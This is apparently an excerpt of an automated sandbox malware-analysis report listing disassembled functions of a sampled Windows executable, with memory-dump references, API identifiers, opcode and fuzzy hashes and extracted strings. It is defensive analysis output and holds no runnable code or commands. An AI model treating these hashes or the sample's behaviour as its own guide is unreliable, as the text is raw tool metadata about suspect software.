                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 2$2
                                                                                                        • API String ID: 0-3784399050
                                                                                                        • Opcode ID: c9ff9ae3ff6a2fe64a4c15407332d654a052168682713aca6000e7b424874b26
                                                                                                        • Instruction ID: d95e04384515760c8077cfb583c7e2f0b504b1a60d5782f996e1045b7b8e6a01
                                                                                                        • Opcode Fuzzy Hash: c9ff9ae3ff6a2fe64a4c15407332d654a052168682713aca6000e7b424874b26
                                                                                                        • Instruction Fuzzy Hash: A72393B25186918BD378CF35C58063CBBB1FB89B59F958239DB8A47749CB38D841CB21
                                                                                                        Function 00007FF79E946EE0 Relevance: 4.6, APIs: 3, Instructions: 76filenativesynchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFileObjectReadSingleStatusWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 3583596364-0
                                                                                                        • Opcode ID: 4eed91d9a39560526d7a8d9eec06e0ee47547f55f7c86c8f1b09b9148c06fbaa
                                                                                                        • Instruction ID: 242d2519f1ce363ae5227b986de35e952499369cbdec813ee48163d8ccde998b
                                                                                                        • Opcode Fuzzy Hash: 4eed91d9a39560526d7a8d9eec06e0ee47547f55f7c86c8f1b09b9148c06fbaa
                                                                                                        • Instruction Fuzzy Hash: CF31C432F04B5199EB20DB70E8807E977A4EB54368F944130FA8D82A85EF3CD1908361
                                                                                                        Function 00007FF79E90F030 Relevance: 4.5, APIs: 3, Instructions: 784COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3510742995-0
                                                                                                        • Opcode ID: 66faf038dc771811f08e6b7d2005b5ef64b676d56c9f5e11716b5846ad14df1d
                                                                                                        • Instruction ID: dba9ebd178ee16e6695514530618ee073201e9efcb30683dce24cc9902a7eb81
                                                                                                        • Opcode Fuzzy Hash: 66faf038dc771811f08e6b7d2005b5ef64b676d56c9f5e11716b5846ad14df1d
                                                                                                        • Instruction Fuzzy Hash: F262F4A2B04B8582EB209F2995006EC6721F755BE8F858731DF6E573D1EF38E684C311
                                                                                                        Function 00007FF79E90D1D0 Relevance: 4.4, APIs: 3, Instructions: 679COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3510742995-0
                                                                                                        • Opcode ID: 93119471c1f6efe8fbfbf97ed26e9b2a80bd43b04e852abf22b216e192d1ffd0
                                                                                                        • Instruction ID: 1e25ce8eea64f6b007ff2f1bd2a8a7c6157300e15561c15e2e3992ff705126cb
                                                                                                        • Opcode Fuzzy Hash: 93119471c1f6efe8fbfbf97ed26e9b2a80bd43b04e852abf22b216e192d1ffd0
                                                                                                        • Instruction Fuzzy Hash: D652C352E04BC487E7219F3896412E86760FB687E8F86A721DF6D13796EB34E2D1C310
                                                                                                        Function 00007FF79E90DC80 Relevance: 4.4, APIs: 3, Instructions: 677COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c829463470470f7b4964831b1ac1f0c3118e2d0008bfd1ec6e7c66954680678c
                                                                                                        • Instruction ID: 787294212a7b26eb5d8e1ebf97d444775a57fa733631f62f475ff6a5d4ae0ab0
                                                                                                        • Opcode Fuzzy Hash: c829463470470f7b4964831b1ac1f0c3118e2d0008bfd1ec6e7c66954680678c
                                                                                                        • Instruction Fuzzy Hash: 9D62C063A14BC486EB209F28D5402E87774FB687A8F859721DF6D133A5EF38E295C311
                                                                                                        Function 00007FF79E993350 Relevance: 4.1, Strings: 3, Instructions: 332COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: <$INFINITY$NAN
                                                                                                        • API String ID: 0-2314501456
                                                                                                        • Opcode ID: 25cdb153779fdb788de3b14be86f6e6bfe9936a62491776514dcf1e098ff83ad
                                                                                                        • Instruction ID: b4d96fa4af463438720b1d68ab2097231c5b07f58b8893a8f59e9c2e0efbf973
                                                                                                        • Opcode Fuzzy Hash: 25cdb153779fdb788de3b14be86f6e6bfe9936a62491776514dcf1e098ff83ad
                                                                                                        • Instruction Fuzzy Hash: F4D11392E1828245FB31EE3584C53BDE7AAAF417A4FC44531D91D963D3EE3DE9818232
                                                                                                        Function 00007FF79E91B800 Relevance: 3.1, APIs: 1, Instructions: 1894COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 70dc1c02b5097ec0f2f7ae725ff55147b625c185937b75409fc0230ca7587782
                                                                                                        • Instruction ID: 18763f064b4c1d892cc4ce70ae55718693eb0405d3c65a36068939033603fc7a
                                                                                                        • Opcode Fuzzy Hash: 70dc1c02b5097ec0f2f7ae725ff55147b625c185937b75409fc0230ca7587782
                                                                                                        • Instruction Fuzzy Hash: 9B138B62A08BD18DE775DF34D8803ED63A1FB047A8F805225DB9D4BB99DF389691C321
                                                                                                        Function 00007FF79E991780 Relevance: 3.1, Strings: 2, Instructions: 557COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: assertion failed: digits < 3$assertion failed: noborrowassertion failed: digits < 40assertion failed: other > 0assertion failed: !d.is_zero()_
                                                                                                        • API String ID: 0-2607668560
                                                                                                        • Opcode ID: 98b3385c3d579fad76b66177bc2c53a2ba71a8cce4d1cbd7e4d5b219d9e7a95d
                                                                                                        • Instruction ID: 07ab1daabf3b8edcf74677baa97bd120fecc5c9493b7ba2e99e24c926aaf9453
                                                                                                        • Opcode Fuzzy Hash: 98b3385c3d579fad76b66177bc2c53a2ba71a8cce4d1cbd7e4d5b219d9e7a95d
                                                                                                        • Instruction Fuzzy Hash: 1A223463B0978189FB31AB7594903F8ABA4FB59728F894135CA5E03BD1DA3CD591C331
                                                                                                        Function 00007FF79E947E00 Relevance: 3.0, APIs: 2, Instructions: 27networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastrecv
                                                                                                        • String ID:
                                                                                                        • API String ID: 2514157807-0
                                                                                                        • Opcode ID: 45e5a4eca5cadc96d0c24ec66248536777e5090cf60622d376e66ea3902a8e92
                                                                                                        • Instruction ID: 5b975f1fbdf3b248e68ffa5de01d8fa3405692b6d16a229367690e6f38ba6c43
                                                                                                        • Opcode Fuzzy Hash: 45e5a4eca5cadc96d0c24ec66248536777e5090cf60622d376e66ea3902a8e92
                                                                                                        • Instruction Fuzzy Hash: 71E02B21B0818989FF3870B64485375828B4B88770FA44334D83D873D1EE0C9C910732
                                                                                                        Function 00007FF79E90B350 Relevance: 2.9, APIs: 2, Instructions: 425COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5de9433cb98f94a430e6aaf40341db30cdcb2d7d06c1631c28e4995252198cf9
                                                                                                        • Instruction ID: 11e381a31226630659c868368f91c755539c11ca5fb5d82bd1c7294798705360
                                                                                                        • Opcode Fuzzy Hash: 5de9433cb98f94a430e6aaf40341db30cdcb2d7d06c1631c28e4995252198cf9
                                                                                                        • Instruction Fuzzy Hash: 2402A062A18A8585EB70DF35D8983ED6760F754BA8FC04632CE1E4B794EF39D285C321
                                                                                                        Function 00007FF79E90BA80 Relevance: 2.9, APIs: 2, Instructions: 418COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 48d0c3accc6ac4c58f77e314b3ae2c2632e14838a64a6af3b66b43d06663d990
                                                                                                        • Instruction ID: b1f78b705d7b9ce8a02a13504cd4685d11b0811c899828778fe5b960732f2cc4
                                                                                                        • Opcode Fuzzy Hash: 48d0c3accc6ac4c58f77e314b3ae2c2632e14838a64a6af3b66b43d06663d990
                                                                                                        • Instruction Fuzzy Hash: B2F1D762B08AC586EB709F3598883F96361F754BE9F814631CE1E4B795DF38D681C321
                                                                                                        Function 00007FF79E989750 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: -+NaNinf00e00E0assertion failed: ndigits > 0$e0E0assertion failed: buf.len() >= ndigits || buf.len() >= maxlen
                                                                                                        • API String ID: 0-3864725730
                                                                                                        • Opcode ID: 547a5d9ec5138697606fc12009170360ae8bddcb2323316c68655c41b2df0fc9
                                                                                                        • Instruction ID: 3033e1da6d9af7ad5aec41514eed7306c8d90b8aaa8f6c2f2b80721b50af14bd
                                                                                                        • Opcode Fuzzy Hash: 547a5d9ec5138697606fc12009170360ae8bddcb2323316c68655c41b2df0fc9
                                                                                                        • Instruction Fuzzy Hash: 16F1E1A2A08B8189E7329F34D8807E963A5FB04358F905135EB4D5BBA8DF7C9746C361
                                                                                                        Function 00007FF79E999BC0 Relevance: 2.8, Strings: 2, Instructions: 288COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: -+NaNinf00e00E0assertion failed: ndigits > 0$00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19
                                                                                                        • API String ID: 0-1873708790
                                                                                                        • Opcode ID: b47bf52a956a6c958f1587c6764a72f770f8ed38a988b0e8f0d788a256c7815f
                                                                                                        • Instruction ID: eda849dda4ba4b5cd13a147e6a3e8a5f51cf2ce0d0b3ac5e551ec1b4717f95e6
                                                                                                        • Opcode Fuzzy Hash: b47bf52a956a6c958f1587c6764a72f770f8ed38a988b0e8f0d788a256c7815f
                                                                                                        • Instruction Fuzzy Hash: 89A1CD62B186554AEF24DF3AD9443B8A796FB057D4F84C531DE0E87794EA3CE841C322
                                                                                                        Function 00007FF79E93DD00 Relevance: 2.8, Strings: 2, Instructions: 273COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: overflow when adding duration to instantlibrary\std\src\time.rs$overflow when subtracting duration from instant
                                                                                                        • API String ID: 0-3373325108
                                                                                                        • Opcode ID: 0565f850d5a905c63ce04a5ade45597cded546ea6001bd2c79164f9e7debcf4c
                                                                                                        • Instruction ID: c8dbc6a388b1c6cbbe4451a21c66dcc7026df4aa8af5d11a7c4e94cc800c0105
                                                                                                        • Opcode Fuzzy Hash: 0565f850d5a905c63ce04a5ade45597cded546ea6001bd2c79164f9e7debcf4c
                                                                                                        • Instruction Fuzzy Hash: 72B13572F2475649EB24EB74E8C47B8A366EB54368F90D231C91D16BE4EF3CA1858330
                                                                                                        Function 00007FF79E901665 Relevance: 2.8, Strings: 2, Instructions: 260COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 3333$UUUU
                                                                                                        • API String ID: 0-2679824526
                                                                                                        • Opcode ID: 0b221bbdeef47010658f7fc4f1bdbca6138b9f93817a83bd168641643622ae09
                                                                                                        • Instruction ID: 705165c59be0a231114899c2131b2ae6b90a5c6ae30e1b87266c2df96016a1a1
                                                                                                        • Opcode Fuzzy Hash: 0b221bbdeef47010658f7fc4f1bdbca6138b9f93817a83bd168641643622ae09
                                                                                                        • Instruction Fuzzy Hash: 49B1F572A18A8582E7369F26E0903FAB3B1FB85759FC04135EB8A02794DF3CD555C721
                                                                                                        Function 00007FF79E93FF10 Relevance: 2.7, Strings: 2, Instructions: 190COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0123456789abcdef$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards
                                                                                                        • API String ID: 0-2027556079
                                                                                                        • Opcode ID: f125fa777c9b713af963a93f8e5d16da6fa5998d30dfe893d3f77d8afa9f9e5c
                                                                                                        • Instruction ID: c70655bc191dcb229acb870a8097ced88578d1bd5d524222fca73c6d18813c15
                                                                                                        • Opcode Fuzzy Hash: f125fa777c9b713af963a93f8e5d16da6fa5998d30dfe893d3f77d8afa9f9e5c
                                                                                                        • Instruction Fuzzy Hash: 22619193E085E189F329AF3448A02BDAF61B716364F844135DEAB377E5D93C9142D332
                                                                                                        Function 00007FF79E923DD0 Relevance: 2.4, APIs: 1, Instructions: 1116COMMON
